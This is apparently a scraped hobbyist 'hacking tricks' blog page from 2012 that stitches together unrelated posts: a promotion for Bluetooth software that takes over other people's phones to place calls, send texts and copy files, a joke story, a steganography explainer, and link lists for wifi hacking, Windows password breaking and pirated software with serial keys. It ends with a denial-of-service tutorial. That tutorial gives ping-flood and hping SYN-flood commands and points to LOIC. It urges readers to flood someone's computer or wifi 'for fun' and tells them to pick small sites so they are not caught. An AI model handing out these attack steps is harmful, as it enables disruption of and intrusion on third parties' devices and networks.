What this Bluetooth hacking software do ?

Heres' the SECRET

Connect to to any mobile with the help of bluetooth then u can call to any person with ur mobile and and no. will be shown will the mobile u r connected to and and money will charged of the connected phone ::

U can send sms to the other mobile from the mobile u r connected ::
U can delete copy and even cut some items from his mobile to ur mobile ::

U can do bar code hacking  just insert bar code no.s and u get all the details
U have dictionary of computer science, Hindi to English and vice versa words converter and English to Hindi dictionary

U can send free sms joining to free sms websites
U can send sms at the time u want :: Fix the time and sms will be sent to the person

U can lock ur personal folders
U will have different types of music players

U will have opera mini
U have some useful things of SEX like kamasutra too

Enjoy more then 85 applications of mobile and Bluetooth hacking

TO download applications all in one time => Click on me :)

Countermeasures For Bluetooth hacking

* All the softwares works well in Nokia phones

** When someone asking for connection and ask for type in the pin :: here it hacking ur Bluetooth only samsung mobiles ask for pin

*** Always close ur Bluetooth when its not in use :: two things happens u will save 20% of battery and will save from hacking

**** always look into the person phone y is it asking, pin for ::

Some more interesting Things

To know how to spy mobile => Click on me

Check whether Nokia phone good quality or not => Click on me

How to track ur lost phone => Click on me

How to trace ur phone => Click on me

A Mans Life

Saturday, 4 February 2012

A Mans Life ::

God created the donkey
and said to him.
"You will be a donkey. You will work un-tiringly
from sunrise to sunset carrying burdens on your back.
You will eat grass, you will have no intelligence
and you will live 50 years."
The donkey answered:
"I will be a donkey, but to live 50 years is much. Give me only 20 years"
God granted his wish.


God created the dog
and said to him:
"You will guard the house of man. You will be his best Friend.
You will eat the scraps that he gives you and you will live 30 years.
You will be a dog.
The dog answered:
"Sir, to live 30 years is too much,give me only 15 years." God granted his wish.


God created the monkey
and said to him:
"You will be a monkey. You will swing from
branch to branch doing tricks. You will be
amusing and you will live 20 years.
The monkey answered:
"To live 20 years is too much, give me only 10 years." God granted his wish.


Finally God created man...
and said to him:
"You will be man, the only rational creature on the face of the earth.
You will use your intelligence to become master over all the animals.
You will dominate the world and you will live 20 years." Man responded:
"Sir, I will be a man but to live only 20 years is very little,
give me the 30 years that the donkey refused,
the 15 years that the dog did not want
and the 10 years the monkey refused."
God granted man's wish



And since then, man lives 20 years as a man,
marries and spends 30 years like a donkey,
working and carrying all the burdens on his back.

Then when his children are grown,
he lives 15 years like a dog taking care of the house
and eating whatever is given to him.

So that when he is old,
he can retire and live 10 years like a monkey,
going from house to house and from one son or
daughter to another doing tricks to amuse his grandchildren.


That's Life.                                                                                      [help of some site]

Steganography

Friday, 3 February 2012

What is Steganography ?

Steganography is the art and science of writing hidden messages in such a way that no one, apart from the sender and intended recipient.

The advantage of steganography, over cryptography alone, is that messages do not attract attention to themselves. Plainly visible encrypted messages—no matter how unbreakable—will arouse suspicion, and may in themselves be incriminating in countries where encryption is illegal.Therefore, whereas cryptography protects the contents of a message, steganography can be said to protect both messages and communicating parties.

Most imp advantage is ::

Somebody hacked ur id :: u want to send message to someone :: u know ur id is hacked :: hide that data and send it :: tell the password to the sender and he opens it and read the message ::

I know many were thinking y to hide it :: y not make a new id :: see if u forgot the id of the person send him in this way or may it will be ur imp id ::

Second advantage :: a employee can give a imp info to his boss in this way ::

How to use steganography ?Heres' the SECRET


To use steganography we have to use a software call as S-Tools

To Download S-TOOLS => Click on me

How to use S-Tool here is the video tutorial :: => Click on me

SECRET FINALLY REVEALED 100th POST

Wednesday, 25 January 2012

THIS MY 100th POST THAT IS BEING REVEALED

A VERY WARM THANKS TO EVERY USER WHO READ ALL MY BLOGS AND APPRECIATED IT :: I AM VERY THANK FULL TO U ALL THE KNOWLEDGE I SHARED WITH U ALL

TODAY IS NOTHING NEW BUT LINKS SOME SHORTCUTS JUST CLICK AND IT WILL BE REVEALED

"""FACT..." The person who cares lot for others..........is the one who needs more care than others. The person who makes other laugh & smile all time..........is the one who holds lot of pain in heart. The person who tries to be a good friend to all..........is the one who needs a best friend for own. The person who always smiles & says I'm fine..........is the one who is broken at heart but still strong enough to believe that at the end everything is going to be fine!! """

My facebook account =>  Click on me

How to hack WIFI => Click one me
How to safe WIFI => Click on me
Tips to secure ur WIFI => Click on me

Backdoor hacking => Click on me

keep ur laptop/computer safe => Click on me

Ophcrack tutorial =>  Click one me    Click on me 2

Self destructive email => Click on me

Alt code trick => Click on me

Gmail 2 way verification (more safety to gmail) => Click on me

Windows 7 shortcut => Click on me

TO know no. of unknown sim => Click on me

List of Run commands of Windows 7/xp/vista => click on me

Open block websites => Click on me

Internet Pendrive => Click on me

Notepad Virus => Click on me

Countermeasures => Click on me
                                     Click on me 2
                                     Click on me 3

BEST TORRENT SITES

* http://isohunt.com/
** http://torrentz.eu/
*** http://www.torrenttree.com/
**** http://thepiratebay.org/

Some hacking Books

Download hacking books

CEH Official guide =>  Click on me
Hacking Firewalls => Click on me
Gray Hat Hacking => Click on me
Hacking Exposed => Click on me


Video tutorials all in HD

UNETBOOTIN => Click on me

Hide Drive with CMD => Click on me

Break windows 7 password => Click on me

How to fool keylogger => Click on me

Do join my blog and get free software with full serial key :: updates antivirus with serial key :: anything u want
Be safe from being hacked
Now more safe and amazing trick will come

Yours truly
Pprasoon Nigam
CEH

THANKS FOR READING 100th POST

SECRETS FINALLY REVEALED

 Look more about  us => http://www.fraternityindia.in/


The 100th Blog dedicated to some of my special persons who helped me

Yashi Prakash

Aditya Mukherjee
bossi
Deepak dutt srivastava brother

Diffrent Ways to DOS ATTACK

DOS ATTACK  <=>    Denial-of-service attack

What is Dos Attack ?
A denial-of-service attack (DoS attack) or distributed denial-of-service attack (DDoS attack) is an attempt to make a computer or network resource unavailable to its intended users


A DoS attack can be perpetrated in a number of ways. The five basic types of attack are:

* Consumption of computational resources, such as bandwidth, disk space, or processor time.
** Disruption of configuration information, such as routing information.
** Disruption of state information, such as unsolicited resetting of TCP sessions.
*** Disruption of physical network components.
****Obstructing the communication media between the intended users and the victim so that they can no longer communicate adequately.

A DoS attack may include execution of malware intended to

* Max out the processor's usage, preventing any work from occurring.
** Trigger errors in the microde of the machine.
*** Trigger errors in the sequencing of instructions, so as to force the computer into an unstable state or lock-up.
**** Exploit errors in the operating system, causing resource starvation and/or thrashing, i.e. to use up all available facilities so no real work can be accomplished.
***** Crash the operating system itself                              [Wikipedia help]


  • How To Put a DOS ATTACK In Different Ways

    Heres' the SECRET

    First Method :: DOS Attack by CMD (command prompt)

    open ur cmd (window key + r)

    then type nslookup for the website ip

    for eg. nslookup www.google.co.in

    after finding the ip now ready for dos attack

    type in command
    ping website-IP -l 65500 -n 10000000 -w 0.00001

    -n 10000000= the number of DoS attemps.. u can change the value "10000000" with ur desiredvalue u want to attempt attack.

    website-IP= Replace the text with the ip address of the site u want to be attacked..

    -w 0.00001 = It is the waiting time after one ping attack.

    for eg: if the ip address is 112.158.10.2

    just type

    ping 112.158.10.2 -l 65500 -n 10000000 -w 0.00001


    Dos attack with backtrack ::
    Open ur konsole and type these method and ur done


    Step *
    host (website name )   [get the ip address of website]

    Step **
    hping -i u100 -S -p 80 (ipaddress of website)


    Dos attack with LOIC Software

    All the above method are manual method :: now here goes a software name call LOIC

    Loic is a tool used for DDOS (distributed denial-of-service) attack on a website!

    To download the LOIC software => Click on me


    Note ::  Dos attack can be done or they are just effective for the small website :: do not put dos attack on big website it will not work :: or try to have 40 to 50 computers to put dos attack on big website and never put dos attacks on google, yahoo, bing :: these big website u will be caught and no use will be made of ur dos attack ::


    Now fun with Dos attack

    ** Put dos attack on some ones computer ip his computer internet gets slow :: even computer also gets hang ::

    ** Put Dos attack on some ones wifi (BSSID) :: wifi connection speeds gets slow and the all the person using wifi gets low or very slow speed of internet ::


    Do all hackings and tricks for ethical use

    With regards
    Pprasoon nigam
    Join me for more tricks and free help and get job part time to full time => Click on me